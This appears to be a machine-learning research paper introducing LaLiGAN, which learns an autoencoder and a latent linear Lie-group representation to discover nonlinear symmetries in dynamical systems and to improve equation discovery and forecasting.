Symmetry plays an important role in the success of deep neural networks (Bronstein et al., 2021). Many equivariant networks have been developed to enforce various symmetries in data from images to graphs (Weiler & Cesa, 2019; Cohen et al., 2019a; Zaheer et al., 2017; Finzi et al., 2020; Kondor & Trivedi, 2018; Cohen et al., 2019b; Finzi et al., 2021; Bekkers, 2019). A critical limitation of existing equivariant networks is that they require knowing the symmetry a priori. However, for complex real-world data, the underlying symmetries may be unknown or challenging to articulate through programming. Recent years have seen exciting attempts towards automatic symmetry discovery from data (Dehmamy et al., 2021; Moskalev et al., 2022; Benton et al., 2020; Zhou et al., 2021), but most of them search in only a limited space of symmetries, such as subsets of known groups or finite groups. LieGAN (Yang et al., 2023) can discover various types of symmetries, but its search space is still constrained to general linear groups. Successful discovery can only be achieved when observations are measured in an ideal coordinate system where linear symmetry is present. Unfortunately, real-world data often contain nonlinear symmetries, such as high-dimensional dynamics that evolve on a low-dimensional manifold (Champion et al., 2019), or 2D images of 3D objects (Garrido et al., 2023).

Another line of study focuses on learning equivariant representations (Park et al., 2022; Yu et al., 2022; Dangovski et al., 2021; Quessard et al., 2020). These approaches learn a latent embedding space with particular symmetries. However, they still require prior knowledge about the symmetry in the latent space. Also, they often assume additional information about the group transformation associated with each data point, which is not always available in practice.

Figure 1: An example of an SO(2) nonlinear group action $\pi'$ on $V = \mathbb{R}^2$ and its decomposition into an encoder $\phi$, a linear representation $\pi$ and a decoder $\psi$. Each trajectory is a group action orbit containing a random $v \in V$.

In this work, we propose a novel framework, LaLiGAN, for discovering symmetries of nonlinear group actions. LaLiGAN decomposes the group transformations into nonlinear mappings between the data space and a latent space, and a linear group representation in the latent space.
Figure 1 provides an example of such a decomposition, where a nonlinear action of SO(2) on $V = \mathbb{R}^2$ corresponds to a standard 2D rotation on latent vectors $z = \phi(v)$. Then, we utilize an existing symmetry discovery algorithm (Yang et al., 2023) with careful adaptations for discovering symmetries in the latent space. By default, our framework has a learnable group representation and does not require information about a specific group. However, when the symmetry group is known, it can also be used to learn equivariant representations without the information of the group elements associated with each data sample. It is a highly flexible framework and can be applied to scenarios with scarce domain knowledge.

The significance of latent space symmetry discovery is multi-fold. From the perspective of symmetry discovery, it further expands the search space of symmetries beyond linear group actions. For representation learning, learning a latent space in which symmetry becomes linear places a strong inductive bias on the structure of latent representations. Such a simple latent structure proves to be useful in various downstream tasks, such as equation discovery and long-term forecasting in temporal systems. Furthermore, compared to equivariant representation learning, as the symmetry is no longer fixed but learnable, our method can discover latent spaces with previously unknown symmetries. In summary, our main contributions include:

- We develop LaLiGAN, a novel framework for discovering symmetries of nonlinear group actions.
- We provide the theoretical guarantee that LaLiGAN has the expressive power to approximate any nonlinear symmetry under certain conditions.
- Our method can discover well-structured latent spaces with interpretable symmetries in high-dimensional and nonlinear dynamical systems.
- The discovered symmetry can be applied to equation discovery, leading to simpler equation forms and improved long-term prediction accuracy.

2 RELATED WORKS

Automatic symmetry discovery. Automatic symmetry discovery aims to search for and identify unknown symmetries in data. Current symmetry discovery techniques vary a lot in their search space for symmetries, such as learning discrete finite groups (Zhou et al., 2021; Karjol et al., 2023), learning group subsets that represent the extent of symmetry within known groups (Benton et al., 2020; Romero & Lohit, 2022; Chatzipantazis et al., 2021), and learning individual symmetry transformations on the dataset distribution (Desai et al., 2022). Attempts have been made to discover general continuous symmetries based on Lie theory. For example, L-conv (Dehmamy et al., 2021) works with the Lie algebra to approximate any group equivariant function. LieGG (Moskalev et al., 2022) extracts the symmetries of a learned network from its polarization matrix. LieGAN (Yang et al., 2023) proposes a general framework for discovering the symmetries of continuous Lie groups and discrete subgroups. These methods address general linear group symmetry in the data, which is the largest search space so far. Our work expands the search space to nonlinear symmetries.

Learning equivariant representation. Instead of working in the data space where symmetry transformations can be complicated, many works use autoencoders to learn a latent space with pre-specified symmetries (Hinton et al., 2011; Falorsi et al., 2018). Among recent works, Yu et al. (2022) and Park et al. (2022) learn equivariant features that can be used for downstream prediction tasks. Shakerinava et al. (2022) and Dangovski et al.
(2021) use contrastive losses to learn equivariant representations in a self-supervised manner. Quessard et al. (2020) and Marchetti et al. (2023) focus on learning disentangled representations that are highly interpretable. Winter et al. (2022) and Wieser et al. (2020) split the latent space into group-invariant and group-equivariant subspaces. While the emphases of these works vary, the common assumption is that we have to know the symmetry group a priori. Many of them also assume additional information, such as the group element associated with each data point (Garrido et al., 2023) or paired samples under certain transformations (Shakerinava et al., 2022). Our goal is more ambitious: to design a model that simultaneously learns symmetries and the corresponding equivariant representations in latent space with minimal supervision.

Discovering governing equations. Latent space discovery of governing equations was first introduced in the SINDy Autoencoder (Champion et al., 2019), which combines the sparse regression technique for discovering dynamics in Brunton et al. (2016) with an autoencoder network to explore coordinate transformations that lead to parsimonious equations. Several variants of this method have been developed to improve accuracy and robustness to noise (Kaheman et al., 2020; Messenger & Bortz, 2021; Fasel et al., 2022). However, due to the absence of physical constraints, their discovered equations may not respect some physical properties such as isotropy and energy conservation. We highlight this field as an important application of our symmetry discovery method, where enforcing symmetry can regularize the latent space and improve the performance of equation discovery models.

3 REPRESENTATION VS NONLINEAR GROUP ACTION

Equivariant neural networks build on the notion of symmetry groups and their transformations on data. Given a vector space $V$, a group $G$ transforms $v \in V$ via a group action $\pi : G \times V \rightarrow V$ which maps the identity element $e$ to the identity transformation, i.e. $\pi(e, v) = v$, and is compatible with group element composition, i.e. $\pi(g_1, \pi(g_2, v)) = \pi(g_1g_2, v)$. Many existing equivariant networks assume that the group acts linearly on the input vector space. Examples include E(2) symmetry acting on planar image signals (Weiler & Cesa, 2019) and SO(3) symmetry acting on spherical signals (Cohen et al., 2018). In these cases, the linear group action is called a group representation. A group representation is defined as a map $\rho : G \rightarrow \mathrm{GL}(n)$, where $\rho(g) \in \mathbb{R}^{n \times n}$ is an invertible matrix that transforms any vector $v \in \mathbb{R}^n$ by matrix multiplication. Given the group representations on the input and the output spaces, a $G$-equivariant network $f : X \rightarrow Y$ needs to satisfy $\rho_Y(g)f(x) = f(\rho_X(g)x)$. A special case of equivariance is invariance, where the group action on the output space is trivial, i.e. $\rho_Y(g) = \text{id}$.

Equivariant networks with such linear symmetry transformations have several limitations. It is not always possible to find a linear action of the group on the data, e.g. the action of SO(3) on 2D images of 3D objects. Also, we may not even know the symmetry group $G$ itself, so learning equivariant representations for known groups is not an option either. Our goal is to discover both the symmetry group and its nonlinear group action on the data.
Concretely, given the input and output data spaces $X \subseteq \mathbb{R}^n$, $Y \subseteq \mathbb{R}^m$, and the data samples $(x_i, y_i) \in X \times Y$ with an underlying function $y = f(x)$, we want to find a group $G$ and its nonlinear actions $\pi'_X : G \times X \rightarrow X$ and $\pi'_Y : G \times Y \rightarrow Y$ such that $\pi'_Y(g, f(x)) = f(\pi'_X(g, x))$. We denote nonlinear group actions as $\pi'$ to distinguish them from group representations. In the following sections, we will also refer to group representations and nonlinear group actions as linear symmetries and nonlinear symmetries. We will use the theory of Lie groups to describe the continuous symmetry groups of data. We provide some preliminaries about Lie groups and their representations in Appendix B.

4 LaLiGAN: DISCOVERING NONLINEAR SYMMETRY TRANSFORMATIONS

4.1 DECOMPOSING THE NONLINEAR GROUP ACTION

Our major goal is to learn a nonlinear action of a group $G$ on a vector space $V$: $\pi' : G \times V \rightarrow V$. While we could use a neural network $f_\theta$ to directly approximate this function, it would not guarantee the identity and compatibility conditions for a proper group action, i.e. $f_\theta(id, x) = x$ and $f_\theta(g_1, f_\theta(g_2, x)) = f_\theta(g_1g_2, x)$. Instead, we propose to decompose the nonlinear group action into nonlinear maps and a linear group representation. Concretely, we represent any nonlinear group action $\pi' : G \times V \rightarrow V$ as

$$\pi'(g, \cdot) = \psi \circ \pi(g) \circ \phi, \quad (1)$$

where $\phi : V \rightarrow Z$ and $\psi : Z \rightarrow V$ are functions parametrized by neural networks, and $\pi : G \rightarrow \mathrm{GL}(k)$ is a group representation acting on the latent vector space $Z = \mathbb{R}^k$. We specify the dimensionality of $Z$ as a hyperparameter based on the specific task. One can easily verify the following:

Proposition 4.1. If $\phi$ and $\psi$ are inverses of each other, then $\pi'(g, \cdot) = \psi \circ \pi(g) \circ \phi$ is a valid group action that satisfies the identity and compatibility axioms.

Figure 2: Overview of the proposed LaLiGAN framework. The encoder maps the original observations to a latent space. The latent representation is transformed with the linear group action from the generator. The decoder reconstructs the inputs from the original and transformed representations. The discriminator is trained to recognize the difference between the original and the transformed samples.

In practice, we train the networks $\phi$ and $\psi$ with a reconstruction loss $l_{\text{recon}} = \mathbb{E}_v \|\psi(\phi(v)) - v\|^2$ to ensure they are approximate inverses of each other. Intuitively, $\phi$ and $\psi$ form an autoencoder that maps between the input vector space and a latent space. Through the decomposition of the nonlinear group action, our method learns (1) the symmetry group on a latent space via its linear representation, and (2) a pair of inverse mappings between the input space and the symmetric latent space.

We can provide theoretical guarantees for the expressivity of such a decomposition. The following theorem shows that our proposed decomposition and neural network parametrization can approximate nonlinear group actions under certain conditions. Detailed proof is deferred to Appendix C.

**Theorem 4.2 (Universal Approximation of Nonlinear Group Action).** Let $G \leq \mathrm{GL}(k; \mathbb{R})$ be a compact Lie group that acts smoothly, freely and properly on $V = \mathbb{R}^k$ via a continuous group action $\pi': G \times V \to V$.
The group action, restricted to any bounded subset of the group, can be approximated by the decomposition $\pi'(g, \cdot) \approx \psi \circ \pi(g) \circ \phi$ if it admits a simply connected orbit space $V/G$, where $\psi$ and $\phi$ are fixed arbitrary-width neural networks with one hidden layer, and $\pi$ is a linear group representation.

4.2 Symmetry Discovery

Now that we have constructed the nonlinear group action, we proceed to discover the symmetry group $G$. We restrict our search space to $G \leq \mathrm{GL}(k)$, where $k$ is the latent dimensionality defined in the previous decomposition. In this way, we can represent any group element $g$ by its standard representation $\pi(g) \in \mathbb{R}^{k \times k}$. We expect this search space of the general linear group to be large enough to cover the types of symmetries in most real-world systems.

We follow the approach in Yang et al. (2023) to discover the linear symmetry with generative adversarial training. Concretely, a symmetry generator learns a Lie algebra basis $\{L_i \in \mathbb{R}^{k \times k}\}$ and generates the standard representations of group elements by sampling the linear combination coefficients $w_i \in \mathbb{R}$ for the Lie algebra basis:

$$w_i \sim \gamma(w), \quad \pi(g) = \exp \left[ \sum_i w_i L_i \right] \quad (2)$$

where $\gamma$ is a distribution (e.g. Gaussian) for the coefficients and $\exp$ denotes the matrix exponential. As the Lie algebra basis $\{L_i\}$ uniquely determines the structure of the Lie group, we can learn the symmetry group by learning these $L_i$ via standard gradient-based optimization techniques. Then, the symmetry generator introduced in (2) samples random group elements that transform the data points $v_i = (x_i, y_i)$. The discriminator is trained to distinguish the original “real” data from the transformed “fake” data. The generator and the discriminator are trained adversarially so that the generator learns to produce group elements that preserve the data distribution while transforming each data point. The group learned by the generator is then considered the discovered symmetry of the data.

Figure 2 shows the overall pipeline of our method. We term our method Latent LieGAN (LaLiGAN), as we learn the Lie group representations on a latent space. A key difference of our method is the nonlinearity of the group action on data, which is achieved through the decomposition in Eq. (1). Besides, we use the latent representations as the discriminator input. The latent vectors before the group transformations are the “real” samples, and those after the transformations are “fake”. Optionally, we also concatenate each latent vector with its reconstruction in observation space as the discriminator input, which is shown to accelerate convergence. In the most general form, our training objective is formulated as

\[ l_{\text{total}} = w_{\text{GAN}} \cdot l_{\text{GAN}} + w_{\text{recon}} \cdot l_{\text{recon}}, \quad l_{\text{recon}} = \mathbb{E}_v \left[ \| (\psi \circ \phi)(v) - v \|^2 \right], \]

\[ l_{\text{GAN}} = \mathbb{E}_{v,g} \left[ \log D(\phi(v), (\psi \circ \phi)(v)) + \log(1 - D((\pi(g) \circ \phi)(v), (\psi \circ \pi(g) \circ \phi)(v))) \right] \quad (3) \]

where \(D\) is the discriminator, \(\pi(g) = \exp(\sum_i w_i L_i)\) is the representation of the group element sampled from the generator, and \(\phi\) and \(\psi\) are neural networks that compose the nonlinear group action together with \(\pi(g)\).
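A compact sketch of the symmetry generator of Eq. (2) and this joint objective is given below. The tensor shapes follow the text, but the module interfaces, the concatenation layout for the discriminator input, and the batch-centering step (described in Section 4.3) are illustrative assumptions rather than our exact implementation.

```python
import torch
import torch.nn as nn

class SymmetryGenerator(nn.Module):
    """Learns a Lie algebra basis {L_i} and samples group elements via Eq. (2)."""
    def __init__(self, latent_dim, n_generators):
        super().__init__()
        self.L = nn.Parameter(torch.randn(n_generators, latent_dim, latent_dim))

    def forward(self, batch_size, sigma=1.0):
        w = sigma * torch.randn(batch_size, self.L.shape[0])   # w_i ~ gamma(w)
        A = torch.einsum('bc,cij->bij', w, self.L)             # sum_i w_i L_i
        return torch.linalg.matrix_exp(A)                      # pi(g) = exp(...)

def laligan_objective(phi, psi, gen, D, v, w_gan=1.0, w_recon=1.0):
    """Value function of Eq. (3): adversarial loss on latents plus reconstruction.

    D sees a latent vector concatenated with its decoding (v assumed flat);
    the generator/autoencoder minimize and D maximizes this quantity.
    """
    z = phi(v)
    l_recon = ((psi(z) - v) ** 2).mean()
    zc = z - z.mean(dim=0, keepdim=True)            # batch centering (Section 4.3)
    g = gen(zc.shape[0])                            # sampled representations pi(g)
    z_fake = torch.einsum('bij,bj->bi', g, zc)      # linearly transformed latents
    real = D(torch.cat([zc, psi(zc)], dim=-1))
    fake = D(torch.cat([z_fake, psi(z_fake)], dim=-1))
    l_gan = torch.log(real).mean() + torch.log(1.0 - fake).mean()
    return w_gan * l_gan + w_recon * l_recon
```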
The learnable components include \(D\), \(L_i\), \(\phi\) and \(\psi\), which are optimized under the joint objective \(l_{\text{total}}\). The loss weighting coefficients \(w_{\text{GAN}}\) and \(w_{\text{recon}}\) are selected based on the specific task.

4.3 Structuring the Latent Space

Disentangled representation. Latent space representations may capture different aspects of the observations. Consider an image of \(N\) 3D objects as an example. A possible latent representation consists of the orientation of each object \(r_o \in \mathbb{R}^{3N}\), the camera perspective \(r_c \in \mathbb{R}^3\), the light intensity \(i \in \mathbb{R}^+\), etc. Each component can be transformed by a separate group action, independent of the others. For these scenarios, we provide the option to specify how the latent space is decomposed into independent subspaces, i.e. \(Z = \oplus_{i=1}^N Z_i\), each of which is acted on by a symmetry group \(G_i\). This avoids searching in the unnecessarily large space of group actions with no nontrivial invariant subspace. This aligns with the notion of disentangled representation in Higgins et al. (2018).

Regularizing the latent structure. The latent space produced by an encoder network can be largely arbitrary, leading to fallacious symmetry or no symmetry at all. We observe some failure modes caused by undesirable latent space structures and propose some regularization methods. First, the latent representations tend to collapse to a low-dimensional subspace where nontrivially parametrized group representations can act as the identity. Such a fallacious symmetry provides an easy workaround for the symmetry generator. For example, this happens in Figure 3a, where the transformations generated by \(L = [2, -2; -1, 1] \in \mathbb{R}^{2 \times 2}\) leave the latent representations in a 1D subspace approximately unchanged. This is undesirable because we want the symmetry generator to learn nontrivial transformations. In practice, we use an orthogonal parametrization in the final linear layer of the encoder to enforce a different output in each dimension.

Another failure mode occurs when the latent representations are not centered at the origin. The linear group representation \(v \mapsto \pi(g)v\) implicitly assumes that the vector space is centered at the origin and cannot describe the symmetry otherwise. Figure 3b provides an example of a circular latent space centered at \((1, 1)\). Directly applying the SO(2) transformations results in a different distribution. We observe that the encoder struggles to learn to center the latent representations at the origin. Therefore, we enforce this property by normalizing each batch of data to have zero mean before applying the transformations from the symmetry generator.

Figure 3: Potential failure modes in latent space symmetry discovery. (a) Fallacious symmetry in a low-dimensional subspace. (b) Absence of symmetry in a biased latent space.

4.4 Applications of Latent Symmetry Discovery

Learning equivariant representations. Learning equivariant representations can be viewed as a special case of our method, where the symmetry group $G$ and its representation $\pi$ are known. Our encoder $\phi$ then becomes a $G$-equivariant function in the sense that

$$\phi(\pi'(g, x)) = \phi((\psi \circ \pi(g) \circ \phi)(x)) = \pi(g)\phi(x) \quad (4)$$

In other words, by fixing $\pi$ to a known group representation, our method learns a $G$-equivariant representation $z = \phi(x)$.
Compared to other methods, LaLiGAN can learn equivariant representations without any knowledge of the group transformation associated with each data sample.

Joint discovery of governing equation. LaLiGAN is analogous to latent space equation discovery techniques (Champion et al., 2019) in terms of using an autoencoder network for nonlinear coordinate transformations. We can use the latent space learned by LaLiGAN for discovering equations. Concretely, if we want to find a latent space governing equation parameterized by $\theta$, $\dot{z} = F_\theta(z)$, where $z = \phi(x)$ is obtained from our encoder network, we fix the encoder $\phi$ and optimize $\theta$ with the objective $l_{eq} = \mathbb{E}_{x,z}\|(\nabla_x z)\dot{x} - F_\theta(z)\|^2$. While equation discovery and symmetry discovery are two seemingly distinct tasks, we will show in the experiments that learning a symmetric latent space can significantly improve the quality of the discovered equation in terms of both its simplicity and its long-term prediction accuracy.

5 Latent Symmetry in Dynamical Systems

5.1 Datasets

Reaction-diffusion. Many high-dimensional datasets in practical engineering and science problems derive from dynamical systems governed by partial differential equations. These systems often do not exhibit simple linear symmetries in the observation space, but their dynamics might evolve on a low-dimensional manifold with interesting symmetry properties. As an example, we consider a $\lambda$-$\omega$ reaction-diffusion system (Champion et al., 2019) governed by

$$u_t = (1 - (u^2 + v^2))u + \beta(u^2 + v^2)v + d_1(u_{xx} + u_{yy})$$
$$v_t = -\beta(u^2 + v^2)u + (1 - (u^2 + v^2))v + d_2(v_{xx} + v_{yy}) \quad (5)$$

with $d_1 = d_2 = 0.1$ and $\beta = 1$. We discretize the 2D space into a $100 \times 100$ grid, which leads to an input dimension of $10^4$. Figure 4b visualizes a few snapshots of this system. We simulate the system up to $T = 6000$ timesteps with step size $\Delta t = 0.05$.

The reaction-diffusion system is an example of low-dimensional latent symmetry in high-dimensional observations. In fact, the absence of linear symmetry is not exclusive to high-dimensional systems. We also investigate two low-dimensional dynamics whose nonlinear evolution prevents any kind of linear symmetry, but where our method can still discover meaningful symmetries in the latent space.

Nonlinear pendulum. The movement of a simple pendulum can be described by $\dot{q} = p$, $\dot{p} = -\omega^2 \sin(q)$, with $\omega$ being the natural frequency and $q$ and $p$ the angular displacement and angular momentum. In our experiment, we use $\omega = 1$. We simulate $N = 200$ trajectories up to $T = 500$ timesteps with $\Delta t = 0.02$.

Lotka-Volterra system. The Lotka-Volterra equations are a pair of nonlinear ODEs that characterize the dynamics of predator-prey interaction. We consider the canonical form of the equations, $\dot{p} = a - b e^q$, $\dot{q} = c e^p - d$, where $p$ and $q$ are the logarithmic population densities of prey and predator, and the parameters $a, b, c, d$ indicate the growth and death rates of the two populations. In our experiment, we use $a = 2/3$, $b = 4/3$, and $c = d = 1$. We simulate $N = 200$ trajectories up to $T = 10^4$ timesteps with $\Delta t = 0.002$.

5.2 Symmetry Discovery

We train LaLiGAN to learn the nonlinear mappings between observations and latent representations, along with the linear symmetry in the latent space.
Figure 4: Symmetry discovery in the reaction-diffusion system with a 2D latent space. (a) Latent representations of the system at all timesteps. (b) Randomly selected samples from the dataset. (c) Samples transformed by LaLiGAN are similar to the original data. (d) Samples transformed by the baseline, linear LieGAN, are significantly different from the original data.

Figure 5: Latent symmetry discovery in the nonlinear pendulum (upper) and the Lotka-Volterra equations (lower). (a) Original trajectories of the systems. The color of each trajectory corresponds to its Hamiltonian. (b) The trajectories are mapped to a symmetric latent space. (c) Original trajectories transformed by LaLiGAN. (d) Original trajectories transformed by linear LieGAN.

We aim to discover the equivariance of the latent dynamics, i.e. \( z_{t+1} = f(z_t) \Rightarrow gz_{t+1} = f(gz_t) \). Therefore, we take two consecutive timesteps as input, encode them to latent representations with the same encoder weights, and apply the same transformations sampled from the symmetry generator. For the reaction-diffusion system, we follow the setting in Champion et al. (2019) and set the latent dimension \( k = 2 \). Figure 4a shows how the system evolves in the latent space throughout \( T = 5000 \) timesteps. The Lie algebra basis discovered in the latent space is \( L = [0.06, -3.07; 3.05, -0.04] \). This suggests an approximate SO(2) symmetry, which is also evident from the visualization. For the pendulum and the Lotka-Volterra system, we also set the latent dimension to 2, which is the same as their input dimensions. Figure 5b shows the trajectories of these two systems in the latent space, with the discovered symmetries \( L_{\text{pendulum}} = [0, -5.24; 2.16, 0] \) and \( L_{\text{LV}} = [0, 2.43; -2.74, 0] \). These indicate rotation symmetries up to a certain scaling of the latent dimensions.

The validity of the discovered symmetry can be verified by visually inspecting the difference between the transformed and the original samples. For the reaction-diffusion system, Figure 4c shows some samples with random transformations produced by our method, which are similar to the original data displayed in Figure 4b. We also apply the original LieGAN to this task for comparison; the transformed samples are shown in Figure 4d. These samples contain obvious artifacts and are noticeably different from the original data, which suggests the necessity of our method when linear symmetry does not exist in the observation space. Similarly, for the pendulum and the Lotka-Volterra system, we use the learned symmetries to transform each entire trajectory, as shown in Figure 5c. Each trajectory is transformed from the original trajectory of the same color. While each individual data point is taken to a new position, the entire trajectories remain similar before and after the transformation, suggesting that the discovered transformations are indeed symmetries of these systems. In contrast, the linear symmetries learned by LieGAN do not preserve valid trajectories in the observation space, as shown in Figure 5d.

5.3 Effect of Latent Dimensionality

The latent dimension $k$ is a hyperparameter in our method. However, it is not always possible to choose the perfect latent dimension that matches the intrinsic dimension of the system and uncovers symmetry in latent space. To study the robustness of our method under a less ideal hyperparameter configuration, we set the latent dimension to $k = 3$ for the reaction-diffusion system and repeat the experiment.
5.3 Effect of Latent Dimensionality

The latent dimension $k$ is a hyperparameter in our method. However, it is not always possible to choose the perfect latent dimension that matches the intrinsic dimension of the system and uncovers symmetry in latent space. To study the robustness of our method under a less ideal hyperparameter configuration, we set the latent dimension to $k = 3$ for the reaction-diffusion system and repeat the experiment. As shown in Figure 6a, the Lie algebra representation is skew-symmetric, which indicates the symmetry of rotations around a particular axis. This can be easily confirmed, as all the latent representations roughly dwell on a circular 2D subspace. Although it is not the simplest representation, our method still manages to discover the rotation symmetry as in the 2D latent space.

Figure 6: Modeling the reaction-diffusion system in a 3D latent space. (a) The latent representations before and after our discovered symmetry transformations. (b) The discovered latent space with SINDy but without LaLiGAN. (c-d) Simulation trajectories in the previous two latent spaces.

5.4 Equation Discovery

We demonstrate the benefit of learning latent symmetry by using the latent space to discover governing equations, a commonly considered problem for these dynamical systems. We use SINDy (Brunton et al., 2016; Champion et al., 2019) as the equation discovery algorithm, with up to second-order polynomials as candidate functions. The comparison is made between applying SINDy on the latent space learned by our method (LaLiGAN + SINDy) and using the SINDy autoencoder to learn its own latent space (SINDy AE). The results for the reaction-diffusion system are shown in Table 1. The discovered equations from both methods have similar forms in the 2D latent space. In the 3D latent space, the governing equation learned in the LaLiGAN latent space remains linear. On the other hand, applying the SINDy autoencoder alone results in a nonsymmetric latent space (Figure 6b) and a highly complicated governing equation with second-order terms.

| Method | 2D | 3D |
|-----------------|--------------------------------------------------------------------|--------------------------------------------------------------------|
| LaLiGAN + SINDy | $\dot{z}_1 = -0.91z_2$, $\dot{z}_2 = -0.91z_1$ | $\dot{z}_1 = 0.58z_2 - 0.40z_3$, $\dot{z}_2 = -0.56z_1 + 0.54z_3$, $\dot{z}_3 = 0.45z_1 - 0.57z_2$ |
| SINDy AE | $\dot{z}_1 = -0.85z_2$, $\dot{z}_2 = 0.97z_1$ | $\dot{z}_1 = 0.65z_2 - 0.16z_3 + \Theta(z^2)$, $\dot{z}_2 = -0.57z_1 + 0.18z_2 + \Theta(z^2)$, $\dot{z}_3 = 0.45z_1 - 0.57z_2 + \Theta(z^2)$ |

Table 1: Equation discovery on 2D/3D latent spaces for the R-D system. Complete results are available in Appendix A.1.

Long-term forecasting. To further verify the accuracy of the discovered equations, we use them to simulate the dynamics in the latent space. Concretely, given the initial input frame $x_0$, we obtain its latent representation $\hat{z}_0 = \phi(x_0)$ and predict the future $T$ timesteps by iteratively computing $\hat{z}_{t+1} = \hat{z}_t + F(\hat{z}_t) \cdot \Delta t$, where $\dot{\hat{z}} = F(\hat{z})$ denotes the discovered governing equation. Then, we map the representations back to the input space by $\hat{x}_t = \psi(\hat{z}_t)$. Figures 6c and 6d show the simulated latent trajectories from the equations discovered in the 3D latent space with and without LaLiGAN. The trajectory remains close to the ground truth in the symmetric latent space but diverges quickly for the equation discovered by SINDy AE. We also evaluate the forecasting accuracy quantitatively by the relative MSE between the prediction and the ground truth in the observation space, as shown in Figure 7. Besides the symbolic models in Table 1, we also include Neural ODE (Chen et al., 2018) as a baseline. Similar to the symbolic equation discovery, it can also predict the dynamics at arbitrary timesteps with an ODE parametrized by neural nets. Figure 7 shows that the discovered equation learned with latent space symmetry outperforms both the equation from the vanilla SINDy AE and the Neural ODE model in this task of long-term dynamics forecasting.

We also conduct the same experiments of equation discovery and long-term forecasting for the nonlinear pendulum and the Lotka-Volterra system. While they have simple closed-form governing equations in the observation space, we find that discovering a latent space with learnable symmetry can still be beneficial. The symmetry enforces linear governing equations and leads to reduced error accumulation in long-term forecasting. The detailed results are available in Appendix A.2.
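The long-term forecasting procedure just described amounts to a forward-Euler rollout in the latent space followed by decoding. A minimal sketch, with the 2D equation taken from Table 1; `encoder` and `decoder` stand in for the trained networks $\phi$ and $\psi$:

```python
import numpy as np

def rollout(z0, F, n_steps, dt=0.05):
    """Iterate z_{t+1} = z_t + F(z_t) * dt for the discovered latent ODE."""
    zs = [np.asarray(z0, dtype=float)]
    for _ in range(n_steps - 1):
        zs.append(zs[-1] + dt * F(zs[-1]))
    return np.stack(zs)

# 2D equation discovered by LaLiGAN + SINDy for the reaction-diffusion system (Table 1)
F = lambda z: np.array([-0.91 * z[1], -0.91 * z[0]])

def forecast(x0, encoder, decoder, n_steps, dt=0.05):
    z_hat = rollout(encoder(x0), F, n_steps, dt)   # simulate in the latent space
    return np.stack([decoder(z) for z in z_hat])   # map back to the observation space

def relative_mse(x_pred, x_true):
    return np.mean((x_pred - x_true) ** 2) / np.mean(x_true ** 2)
```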
6 Learning Equivariant Representation

Figure 8: Learning equivariant representation of the double-bump world. (a) Learned latent space as the direct sum of two 2D subspaces. The color of the data points corresponds to the location of the rectangular bump in the first component and the triangular bump in the second. (b) From left to right: (1) an original signal $x \in \mathbb{R}^{64}$; (2) reconstructed signal $\psi(\phi(x))$; (3-4) reconstructed signals from transformed latent representations, $\psi((\pi(\theta_1) \oplus I)\phi(x))$ and $\psi((I \oplus \pi(\theta_2))\phi(x))$. The red lines are the bump centers in the original signal.

When we know the linear group representation, we can use LaLiGAN to learn the corresponding group equivariant representation. Unlike previous works (Garrido et al., 2023; Shakerinava et al., 2022), we learn it without any knowledge of the group element associated with each data point.

We consider the example of a double-bump world from Shakerinava et al. (2022). It consists of a rectangular and a triangular bump signal, both cyclically shifted in a fixed-length window. We use the original experiment setting with signal length 64 and bump length 16, visualized in Figure 8b. The cyclic translation of each bump forms an SO(2) group. As each bump is shifted independently, the symmetry group for the composed signal is SO(2) × SO(2). Therefore, we use a 4-dimensional latent space $Z = \mathbb{R}^2 \oplus \mathbb{R}^2$ and fix the Lie algebra basis to $L = L_1 \oplus L_2$, $L_1 = L_2 = [0, 1; -1, 0]$.

Figure 8a shows the latent space learned by LaLiGAN. We observe that rotation in the first component shifts the rectangular bump, while rotation in the second component simultaneously shifts both bumps. This is also evident from the transformed and reconstructed samples in Figure 8b. This provides an example that our method can learn equivariant representations when we do not know the group transformation of each data point. We also include another experiment on SO(3) equivariant representation for a 3D object in Appendix A.4.

7 Conclusion

We propose LaLiGAN, a novel generative modeling framework for discovering nonlinear symmetries. LaLiGAN decomposes the group action into a linear representation on a latent space and a pair of nonlinear mappings between the latent space and the observation space. By jointly optimizing the group representation and the nonlinear mappings, it discovers both the symmetry group and its nonlinear group action on the data. We also show that it can be applied to downstream tasks such as equation discovery, leading to equations with simpler forms and better long-term prediction accuracy. In the future, we plan to study how the knowledge of latent space symmetry can be better incorporated into equation discovery.
For example, symmetry can act as a constraint to compress the search space for equations and accelerate the search. We also plan to investigate the connection between symmetry and other physical properties such as conservation laws. Given the prevalence of symmetries in the natural world, our long-term goal is to develop a general framework for automatically discovering symmetries and other types of governing laws from data and accelerate the scientific discovery process.

REFERENCES

Erik J Bekkers. B-spline cnns on lie groups. *arXiv preprint arXiv:1909.12057*, 2019.

Gregory Benton, Marc Finzi, Pavel Izmailov, and Andrew G Wilson. Learning invariances in neural networks from training data. *Advances in neural information processing systems*, 33:17605–17616, 2020.

Michael M Bronstein, Joan Bruna, Taco Cohen, and Petar Veličković. Geometric deep learning: Grids, groups, graphs, geodesics, and gauges. *arXiv preprint arXiv:2104.13478*, 2021.

Steven L Brunton, Joshua L Proctor, and J Nathan Kutz. Discovering governing equations from data by sparse identification of nonlinear dynamical systems. *Proceedings of the National Academy of Sciences*, 113(15):3932–3937, 2016.

Hugo Caselles-Dupré, Michael Garcia Ortiz, and David Filliat. Symmetry-based disentangled representation learning requires interaction with environments. *Advances in Neural Information Processing Systems*, 32, 2019.

Kathleen Champion, Bethany Lusch, J Nathan Kutz, and Steven L Brunton. Data-driven discovery of coordinates and governing equations. *Proceedings of the National Academy of Sciences*, 116(45):22445–22451, 2019.

Evangelos Chatzipantazis, Stefanos Pertigkiozoglou, Edgar Dobriban, and Kostas Daniilidis. Learning augmentation distributions using transformed risk minimization. *arXiv preprint arXiv:2111.08190*, 2021.

Ricky TQ Chen, Yulia Rubanova, Jesse Bettencourt, and David K Duvenaud. Neural ordinary differential equations. *Advances in neural information processing systems*, 31, 2018.

Taco Cohen, Maurice Weiler, Berkay Kicanaoglu, and Max Welling. Gauge equivariant convolutional networks and the icosahedral cnn. In *International Conference on Machine Learning*, pp. 1321–1330. PMLR, 2019a.

Taco S Cohen, Mario Geiger, Jonas Köhler, and Max Welling. Spherical cnns. *arXiv preprint arXiv:1801.10130*, 2018.

Taco S Cohen, Mario Geiger, and Maurice Weiler. A general theory of equivariant cnns on homogeneous spaces. *Advances in neural information processing systems*, 32, 2019b.

Rumen Dangovski, Li Jing, Charlotte Loh, Seungwook Han, Akash Srivastava, Brian Cheung, Pulkit Agrawal, and Marin Soljačić. Equivariant contrastive learning. *arXiv preprint arXiv:2111.00899*, 2021.

